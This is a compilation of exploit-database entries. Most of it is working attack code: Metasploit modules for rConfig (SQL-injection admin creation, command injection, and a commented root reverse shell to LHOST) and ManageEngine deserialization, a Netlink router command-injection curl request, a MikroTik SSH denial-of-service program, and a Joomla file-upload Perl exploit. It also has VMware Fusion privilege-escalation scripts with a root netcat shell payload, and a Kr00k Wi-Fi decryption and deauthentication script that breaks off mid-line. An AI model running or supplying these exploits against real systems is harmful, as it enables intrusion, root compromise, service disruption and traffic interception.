-
Rconfig 3.x - Chained Remote Code Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Rconfig 3.x Chained Remote Code Execution', 'Description' => ' This module exploits multiple vulnerabilities in rConfig version 3.9 in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `path` parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on Rconfig 3.9.3 and 3.9.4. The steps are: 1. SQLi on /commands.inc.php allows us to add an administrative user. 2. An authenticated session is established with the newly added user 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to execute the payload. 4. Remove the added admin user. Tips : once you get a shell, look at the CVE-2019-19585. 
You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-) ', 'License' => MSF_LICENSE, 'Author' => [ 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/) ], 'References' => [ ['CVE', '2019-19509'], # authenticated rce ['CVE', '2020-10220'], # sqli auth bypass %w[EDB 47982], %w[EDB 48208], ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi ], 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD, 'Targets' => [['Auto', {}]], 'Privileged' => false, 'DisclosureDate' => '2020-03-11', 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects 'PAYLOAD' => 'generic/shell_reverse_tcp' }, 'DefaultTarget' => 0)) register_options [ OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/']) ] end # CHECK IF RCONFIG IS REACHABLE AND INSTALLED def check vprint_status 'STEP 0: Get rConfig version...' res = send_request_cgi!( 'method' => 'GET', 'uri' => '/login.php' ) if !res || !res.get_html_document fail_with(Failure::Unknown, 'Could not check rConfig version') end if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9' print_good('rConfig version 3.9 detected') return Exploit::CheckCode::Appears elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig' print_status('rConfig detected, but not version 3.9') return Exploit::CheckCode::Detected end end # CREATE AN ADMIN USER IN RCONFIG def create_rconfig_user(user, _password) vprint_status 'STEP 1 : Adding a temporary admin user...' 
fake_id = Rex::Text.rand_text_numeric(3) fake_pass = Rex::Text.rand_text_alpha(10) fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin' fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d' userleveladmin = 9 # Administrator user_sqli = "command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--" sqli_res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), 'method' => 'GET', 'vars_get' => { 'search' => 'search', 'searchOption' => 'contains', 'searchField' => 'vuln', 'searchColumn' => user_sqli } ) unless sqli_res print_warning('Failed to create user: Connection failed.') return end print_good "New temporary user #{user} created" end # AUTHENTICATE ON RCONFIG def login(user, pass) vprint_status "STEP 2: Authenticating as #{user} ..." # get session cookie (PHPSESSID) res = send_request_cgi!( 'method' => 'GET', 'uri' => '/login.php' ) @cookie = res.get_cookies if @cookie.empty? 
fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies' return end # authenticate res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'), 'cookie' => @cookie, 'vars_post' => { pass: pass, user: user, sublogin: 1 } ) unless res print_warning('Failed to authenticate: Connection failed.') return end print_good "Authenticated as user #{user}" end def trigger_rce(cmd, _opts = {}) vprint_status "STEP 3: Executing the command (#{cmd})" trigger = "`#{cmd} #`" res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'), 'cookie' => @cookie, 'vars_get' => { 'path' => trigger, 'ext' => 'random' } ) # the page hangs because of the command being executed, so we can't expect HTTP response # unless res # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed' # return # end # unless res.body.include? '"success":true' # fail_with Failure::Unknown, 'It seems that the code was not executed' # return # end print_good 'Command sucessfully executed' end # DELETE A USER def delete_rconfig_user(user) vprint_status 'STEP 4 : Removing the temporary admin user...' del_sqli = "command ; DELETE FROM `users` WHERE `username`='#{user}';--" del_res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), 'method' => 'GET', 'vars_get' => { 'search' => 'search', 'searchOption' => 'contains', 'searchField' => 'vuln', 'searchColumn' => del_sqli } ) unless del_res print_warning "Removing user #{user} failed: Connection failed. Please remove it manually." return end print_status "User #{user} removed successfully !" 
end def cleanup super delete_rconfig_user @username if @username end def exploit check @username = rand_text_alphanumeric(8..12) @password = 'admin' create_res = create_rconfig_user @username, @password login(@username, @password) tmp_txt_file = Rex::Text.rand_text_alpha(10) tmp_zip_file = Rex::Text.rand_text_alpha(10) # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-( # trigger_rce("touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'") trigger_rce(payload.encoded.to_s) end end
-
ManageEngine Desktop Central - Java Deserialization (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::AutoCheck include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Desktop Central Java Deserialization', 'Description' => %q{ This module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions < 10.0.474. Tested against 10.0.465 x64. "The short-term fix for the arbitrary file upload vulnerability was released in build 10.0.474 on January 20, 2020. In continuation of that, the complete fix for the remote code execution vulnerability is now available in build 10.0.479." }, 'Author' => [ 'mr_me', # Discovery and exploit 'wvu' # Module ], 'References' => [ ['CVE', '2020-10189'], ['URL', 'https://srcincite.io/advisories/src-2020-0011/'], ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] ], 'DisclosureDate' => '2020-03-05', # 0day release 'License' => MSF_LICENSE, 'Platform' => 'windows', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ ['Windows Command', 'Arch' => ARCH_CMD, 'Type' => :win_cmd ], ['Windows Dropper', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper ], ['PowerShell Stager', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager ] ], 'DefaultTarget' => 2, 'DefaultOptions' => { 'RPORT' => 8383, 'SSL' => true, 'WfsDelay' => 60 # It can take a little while to trigger }, 'CmdStagerFlavor' => 'certutil', # This works without issue 'Notes' => { 'PatchedVersion' => 
Gem::Version.new('100474'), 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'configurations.do') ) unless res return CheckCode::Unknown('Target is not responding to check') end unless res.code == 200 && res.body.include?('ManageEngine Desktop Central') return CheckCode::Unknown('Target is not running Desktop Central') end version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text unless version return CheckCode::Detected('Could not detect Desktop Central version') end vprint_status("Detected Desktop Central version #{version}") if Gem::Version.new(version) < notes['PatchedVersion'] return CheckCode::Appears("#{version} is an exploitable version") end CheckCode::Safe("#{version} is not an exploitable version") end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :win_cmd execute_command(payload.encoded) when :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end end def execute_command(cmd, _opts = {}) # XXX: An executable is required to run arbitrary commands cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper vprint_status("Serializing command: #{cmd}") # I identified mr_me's binary blob as the CommonsBeanutils1 payload :) serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( 'CommonsBeanutils1', cmd ) # XXX: Patch in expected serialVersionUID serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e" # Rock 'n' roll! 
upload_serialized_payload(serialized_payload) deserialize_payload end def upload_serialized_payload(serialized_payload) print_status('Uploading serialized payload') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'), 'ctype' => 'application/octet-stream', 'vars_get' => { 'udid' => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart', 'filename' => 'logger.zip' }, 'data' => serialized_payload ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') end print_good('Successfully uploaded serialized payload') # C:\Program Files\DesktopCentral_Server\bin register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip') end def deserialize_payload print_status('Deserializing payload') res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'cewolf/'), 'vars_get' => {'img' => '\\logger.zip'} ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not deserialize payload') end print_good('Successfully deserialized payload') end end
-
Netlink GPON Router 1.0.11 - Remote Code Execution
# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution # Date: 2020-03-17 # Exploit Author: shellord # Vendor Homepage: https://www.netlink-india.com/ # Version: 1.0.11 # Tested on: Windows 10 # CVE: N/A Exploit : curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154" http://TARGETIP/boaform/admin/formPing Response : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!--ϵͳĬģ--> <html> <head> <title>PINGԽ</title> <meta http-equiv=pragma content=no-cache> <meta http-equiv=refresh content="2"> <meta http-equiv=cache-control content="no-cache, must-revalidate"> <meta http-equiv=content-type content="text/html; charset=gbk"> <meta http-equiv=content-script-type content=text/javascript> <!--ϵͳcss--> <style type=text/css> @import url(/style/default.css); </style> <!--ϵͳű--> <script language="javascript" src="common.js"></script> </head> <!--------------------------------------------------------------------------------------> <!--ҳ--> <body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000"> <blockquote> <form> <div align="left" style="padding-left:20px;"><br> <div align="left"><b>Finish</b> <br><br> </div> <pre> bin dev etc home image lib mnt proc sbin sys tmp usr var </pre> <input type=button value="back" onClick=window.location.replace("/diag_ping_admin_en.asp")> </div> </form> </blockquote> </body> </html>
-
NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
# Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path # Discovery by: Alan Mondragon "El Masas" # Discovery Date: 2020-03-17 # Vendor Homepage: https://www.veritas.com/ # Software Link : https://www.veritas.com/ # Veritas # Tested Version: 7.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows Server 2008 R2 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Auto NetBackup Client Service NetBackup INET Daemon C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe Auto C:\>sc qc "NetBackup INET Daemon" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NetBackup INET Daemon TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NetBackup Client Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications, where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
-
Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
# Exploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) # Author: Hosein Askari # Date: 2020-03-18 # Vendor Homepage: https://mikrotik.com/ # Model: hAP lite # Processor architecture: smips # Affected Version: through 6.44.3 # CVE: N/A #Description: An uncontrolled resource consumption vulnerability in the SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with the SIGPIPE signal (SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed, or to a socket that is no longer open for reading; the default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management. #details: The issue was reported to MikroTik on 02/25/2020. First response from MikroTik on 02/26/2020. Additional information about the exploit and a PoC video were sent on 02/26/2020. The vulnerability was accepted by "Reinis-Jānis S" from the MikroTik security team on 02/27/2020, who asked for the CVE number and disclosure date to be provided. #PoC: #Mitigation: It can be mitigated with firewall filter and service port restrictions. 
Solution: Hardening and tuning the daemon for these 2 parameters: 1- Number of allowed unauthenticated connections to ssh daemon 2- Maximum number of connections at which we start dropping everything for ssh daemon PoC: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <signal.h> #include <netinet/in.h> #include <arpa/inet.h> #define MAX_CON 32 #define MAX_THREADS 16 int Socket(char *ip, char *port) { struct addrinfo hints, *ret, *p; int sock, r; ssize_t bytes; char buffer[2048]; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(ip, port, &hints, &ret))!=0) { return EXIT_FAILURE; } for(p = ret; p != NULL; p = p->ai_next) { if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { continue; } if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { close(sock); continue; } break; } if(ret) freeaddrinfo(ret); fprintf(stderr, "ESTABLISHED %s:%s\n", ip, port); return sock; } void signal_callback_handler(int signum){ printf("Caught signal SIGPIPE %d\n",signum); } void mal(char *ip, char *port, int id) { int sockets[MAX_CON]; int i, g=1, r; for(i=0; i!= MAX_CON; i++) sockets[i]=0; signal(SIGPIPE, signal_callback_handler); while(1) { for(i=0; i!= MAX_CON; i++) { if(sockets[i] == 0) sockets[i] = Socket(ip, port); r=write(sockets[i], "\0", 1); if(r == -1) { close(sockets[i]); sockets[i] = Socket(ip, port); } } usleep(200000); } } int main(int argc, char **argv) { int i; for(i=0; i!= MAX_THREADS; i++) { if(fork()) mal(argv[1], argv[2], i); usleep(200000); } getc(stdin); return 0; } ######### Sincerely, Hosein Askari
-
Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload
# Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload # Google Dork: inurl:"index.php?option=com_acym" # Date: 2020-03-16 # Exploit Author: qw3rTyTy # Vendor Homepage: https://www.acyba.com/ # Software Link: https://www.acyba.com/acymailing/download.html # Version: v6.9.1 Starter # Tested on: Joomla! v3.9.0 # CVE: N/A ######################################################################################## #Analysis of vulnerability ######################################################################################## Vulnerable code is in MailsController::setNewIconShare() in file "back/controllers/mails.php". [BEGIN_CODE] 600 public function setNewIconShare() 601 { 602 $socialName = acym_getVar('string', 'social', ''); 603 $extension = pathinfo($_FILES['file']['name']); 604 $newPath = ACYM_UPLOAD_FOLDER.'socials'.DS.$socialName; 605 $newPathComplete = $newPath.'.'.$extension['extension']; 606 //There code is no checking CSRF token, no sanitizing, and authentication. 607 if (!acym_uploadFile($_FILES['file']['tmp_name'], ACYM_ROOT.$newPathComplete) || empty($socialName)) { //!!! 608 echo 'error'; 609 exit; 610 } 611 612 $newConfig = new stdClass(); 613 $newConfig->social_icons = json_decode($this->config->get('social_icons', '{}'), true); 614 615 $newImg = acym_rootURI().$newPathComplete; 616 $newImgWithoutExtension = acym_rootURI().$newPath; 617 618 $newConfig->social_icons[$socialName] = $newImg; 619 $newConfig->social_icons = json_encode($newConfig->social_icons); 620 $this->config->save($newConfig); 621 622 echo json_encode( 623 [ 624 'url' => $newImgWithoutExtension, 625 'extension' => $extension['extension'], 626 ] 627 ); 628 exit; 629 } function acym_uploadFile($src, $dest) { $dest = acym_cleanPath($dest); $baseDir = dirname($dest); if (!file_exists($baseDir)) { acym_createFolder($baseDir); } if (is_writeable($baseDir) && move_uploaded_file($src, $dest)) {//!!! 
if (@chmod($dest, octdec('0644'))) { return true; } else { acym_enqueueMessage(acym_translation('ACYM_FILE_REJECTED_SAFETY_REASON'), 'error'); } } else { acym_enqueueMessage(acym_translation_sprintf('ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION', $baseDir), 'error'); } return false; } [END_CODE] ######################################################################################## #Exploit ######################################################################################## #!/usr/bin/perl # #$> perl ./exploit.pl "http://127.0.0.1/joomla" "lolz" /tmp/lolz.php use strict; use warnings; use LWP::UserAgent; use JSON(qw/decode_json/); ######################################################################################## sub print_usage_and_exit { print("*** com_acym Arbitrary File Upload exploit\n"); print("Usage: $0 <URL> <path_to_upload> <file_to_upload>\n"); print("\n"); exit(); } sub fetch_useragent { my @available_useragents = ( "gertrud barkhorn", "erica hartmann", "eila ilmatar juutilainen", ); return($available_useragents[(rand(scalar(@available_useragents)))]); } sub is_valid_url { my $given_url = shift(@_); return 1 if ( $given_url =~ /^http(s)?:\/\// ); return 0; } sub do_die { my $errmsg = shift(@_); printf("[!] 
%s\n", $errmsg); exit(); } sub get_base_path { return(sprintf("%s/index.php", $_[0])); } sub do_exploit { my %params = %{ shift(@_); }; my $ua = LWP::UserAgent->new( "agent" => $params{"useragent"}, "timeout" => 360 ); print("[+] Trying to exploit ...\n"); print("[*] Sending POST request ...\n"); my $response = $ua->post( get_base_path($params{"url"}), "Content-Type" => "form-data", "Accept-Language" => "zh-cn", "Content" => { "option" => "com_acym", "ctrl" => "frontmails", "task" => "setNewIconShare", "social" => $params{"path"}, "file" => [ $params{"file"} ], }, ); if ( $response->code == 200 ) { my $j = decode_json($response->decoded_content); my $f = sprintf("%s.%s", $j->{"url"}, $j->{"extension"}); my $response = $ua->head($f); printf("[\$] Uploaded file in %s\n", $f) if ( $response->code == 200 ); } } sub main { print_usage_and_exit() if ( scalar(@ARGV) < 2 ); my %params = ( "url" => $ARGV[0], "path" => $ARGV[1], "file" => $ARGV[2], "useragent" => fetch_useragent()); do_die("Given invalid URL.") if ( !is_valid_url($ARGV[0]) ); do_die("Given invalid File.") if ( (!-e $ARGV[2]) or (stat($ARGV[2]))[7] == 0); printf("[*] Parameters:\n"); while ( my ($k, $v) = each(%params) ) { printf("[+] %s => %s\n", $k, $v); } printf("*" x50 . "\n"); while ( 1 ) { printf("[?] Proceed(y/n)> "); my $c = <STDIN>; chomp($c); if ( (length($c) == 1) and lc($c) eq "y" ) { do_exploit(\%params); last; } } } main(); ########################################################################################
-
Microsoft VSCode Python Extension - Code Execution
# VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension. >TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository. You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html). ## HowTo - Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git` - Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app* - Open `test.py` in VScode Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48231.zip
-
VMWare Fusion - Local Privilege Escalation
Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: * VMware Fusion 10.1.3 (9472307) on macOS 10.13.6 * VMware Fusion 11.0.0 (10120384) on macOS 10.14.1 * VMware Fusion 11.0.2 (10952296) on macOS 10.14.1 * VMware Fusion 11.5.0 (14634996) on macOS 10.15.1 * VMware Fusion 11.5.1 (15018442) on macOS 10.15.1 Exercising: 1) Ensure the VMware Fusion services are not running. If open, quit the VMware Fusion GUI. 2) Run one of the exploit scripts (exploit_fusion.sh or exploit_usb.sh). They will remain running until manually stopped via CTRL-c. The exploit will start a netcat listener as root on TCP port 3333. 3) Connect to the netcat listener: nc 127.0.0.1 3333 Details: This vulnerability is a directory traversal bug inside of VMware Fusion. Several of the programs included in VMware Fusion rely on their path on disk to find other libraries, helper utilities, and service daemons. Two such instances of this code pattern in SUID programs can be found in the "Open VMware Fusion Services" executable and the "Open VMware USB Arbitrator Service" executable. These programs try to open the service programs by looking for the files: Open VMware Fusion Services: $DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services Open VMware USB Arbitrator Service: $DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service Ordinarily this is fine, as any attempt to copy the programs will not copy the SUID ownership of the file, and any attempt to move the programs will fail without root access. Furthermore, symbolic links will not trick the programs into using the new location. However, on macOS unprivileged users can create hard links to SUID executables, which will trick the programs. 
Thus, by creating an adequate directory layout and hard linking to the SUID programs, we can trick them into running an executable of our choice as the root user. The included exploit_usb.sh and exploit_fusion.sh scripts set up the correct directory structure and hard link, compile the payload, and run the linked program in order to start a netcat listener as root on TCP port 3333. In addition to the two SUID executables listed above, the SUID executable "vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two libraries, libcrypto and libssl, from the incorrect directory. However, the two libraries must be signed by Apple or with an Apple-distributed signing certificate from an organization containing the word "VMware". As such, this bug is harder to exploit in vmware-authd. Depending on how strict Apple's developer verification process is, it may be possible to fool Apple into granting a matching certificate by hiding VMware within a phrase, such as with a certificate for "Never Mind Where cloud services inc (NVMware Inc)". One limitation of this vulnerability is that these two vulnerable service openers will not try to open their services if the service is already running. Thus, the exploit will not work if the "VMware USB Arbitrator Service" and "VMware Fusion Services" services are already running, and so if the VMware Fusion GUI is open, this vulnerability cannot be exploited. However, closing the GUI will stop the services associated with the vulnerable service openers and make the vulnerability once again exploitable. In contrast, the library injection attack is not subject to these restrictions (but requires the appropriate certificate). As a side note, the vulnerable code is also used in VMware Workstation on Linux. However, Linux does not allow an unprivileged user to create hard links to files they do not own. As such, this bug is not exploitable in VMware Workstation on Linux. 
Timeline: 2019.11.12 Reported to VMware 2019.12.18 VMware confirms they can reproduce the issue 2019.12.24 Asked for status update, were told we'd get an update in early Jan 2020.01.08 Requested status update, were told fix scheduled for April 2020 2020.01.15 Called VMware to discuss 2020.01.21 Follow up meeting with VMware to discuss 2020.03.17 VMware releases patch & public disclosure ## exploit_fusion.sh ``` #!/bin/sh # Remake the necessary folder structure rm -rf a Contents mkdir -p Contents/Library/services/ mkdir -p a/b/c/ # Build our payload clang payload.c -o "Contents/Library/services/VMware Fusion Services" # Create a hard link to the VMware SUID opener program ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked # Run the linked program, which causes it to be confused about the path, and # launch our payload. Additionally if our payload exits, VMware will relaunch # it a/b/c/linked ``` ## exploit_fusion.sh EOF ## exploit_usb.sh ``` #!/bin/sh # Remake the necessary folder structure rm -rf a Contents mkdir -p Contents/Library/services/ mkdir -p a/b/c/ # Build our payload clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service" # Create a hard link to the VMware SUID opener program ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked # Run the linked program, which causes it to be confused about the path, and # launch our payload. Additionally if our payload exits, VMware will relaunch # it a/b/c/linked ``` ## exploit_usb.sh EOF ## payload.c ``` #include <stdlib.h> #include <unistd.h> int main(int argc, char**argv) { setuid(0); system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f"); return 0; } ``` ## payload.c EOF
-
Broadcom Wi-Fi Devices - 'KR00K Information Disclosure
# Kr00ker # # Experimental KR00K PoC in python3 using scapy # # Description: # This script is a simple experiment to exploit the KR00K vulnerability (CVE-2019-15126), # which allows decrypting some WPA2 CCMP data on vulnerable devices. # More specifically, this script attempts to retrieve the plaintext data of WPA2 CCMP packets knowing: # * the TK (128 bits, all zero) # * the Nonce (sent in plaintext in the packet header) # * the Encrypted Data # # Where: # * WPA2 AES-CCMP decryption --> AES(Nonce,TK) XOR Encrypted Data = Decrypted Data # * Decrypted stream starts with "\xaa\xaa\x03\x00\x00\x00" # * Nonce (104 bits) = Priority (1byte) + SRC MAC (6bytes) + PN (6bytes) # # This PoC works on WPA2 AES CCMP with Frequency 2.4GHz WLANs. # # References: # https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf # # # Copyright (C) 2020 Maurizio Siddu # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. 
If not, see <http://www.gnu.org/licenses/> import argparse, threading import datetime, sys, re from scapy.all import * from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth from Cryptodome.Cipher import AES # Proof of Sympathy ;-) LOGO = """\ __ _ ____ __ __ __ _ ____ ____ ( / )( _ \ / \ / \( / )( __)( _ \\ ) ( ) /( 0 )( 0 )) ( ) _) ) / (__\_)(__\_) \__/ \__/(__\_)(____)(__\_) """ KR00K_PATTERN = b'\xaa\xaa\x03\x00\x00\x00' class Krooker: # Define Krooker class def __init__(self, interface, target_mac, other_mac, reason, num, delay): self.interface = interface self.target_mac = target_mac self.other_mac = other_mac self.reason = reason self.num = num self.delay = delay def wpa2_decrypt(self, enc_pkt): # Try to decrypt the data contained in the sniffed packet t_key = bytes.fromhex("00000000000000000000000000000000") # This check is redundant if not enc_pkt.haslayer(Dot11CCMP): return None dot11 = enc_pkt[Dot11] dot11ccmp = enc_pkt[Dot11CCMP] # Extract the Packet Number (IV) PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(dot11ccmp.PN5,dot11ccmp.PN4,dot11ccmp.PN3,dot11ccmp.PN2,dot11ccmp.PN1,dot11ccmp.PN0) # Extract the victim MAC address source_addr = re.sub(':','',dot11.addr2) # Extract the QoS tid if enc_pkt.haslayer(Dot11QoS): tid = "{:01x}".format(enc_pkt[Dot11QoS].TID) else: tid = '0' priority = tid + '0' # Build the nonce ccmp_nonce = bytes.fromhex(priority) + bytes.fromhex(source_addr) + bytes.fromhex(PN) # Finally try to decrypt wpa2 data enc_cipher = AES.new(t_key, AES.MODE_CCM, ccmp_nonce, mac_len=8) decrypted_data = enc_cipher.decrypt(dot11ccmp.data[:-8]) return decrypted_data def disassociate(self): # Forge the dot11 disassociation packet dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason) # Loop to send the disassociation packets to the victim device while True: # Repeat every delay value seconds time.sleep(self.delay) 
print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac) sendp(dis_packet, iface=self.interface, count=self.num, verbose=False) def check_packet(self, sniffed_pkt): # Filter for WPA2 AES CCMP packets containing data to decrypt if sniffed_pkt[Dot11].type == 2 and sniffed_pkt.haslayer(Dot11CCMP): #print("["+str(datetime.now().time())+"][DEBUG] packet tipe:"+str(sniffed_pkt[Dot11].type)+" sub:"+str(sniffed_pkt[Dot11].subtype)) # Decrypt the packets using the all zero temporary key dec_data = self.wpa2_decrypt(sniffed_pkt) # Check if the target is vulnerable if dec_data and dec_data[0:len(KR00K_PATTERN)] == KR00K_PATTERN: print("["+str(datetime.now().time())+"][+] Target "+self.target_mac+" is vulnerable to Kr00k, decrypted "+str(len(dec_data))+" bytes") hexdump(dec_data) # Save the encrypted and decrypted packets print("["+str(datetime.now().time())+"][+] Saving encrypted and decrypted 'pcap' files in current folder") dec_pkt = bytes.fromhex(re.sub(':','',self.target_mac) + re.sub(':','',self.other_mac)) + dec_data[6:] wrpcap("enc_pkts.pcap", 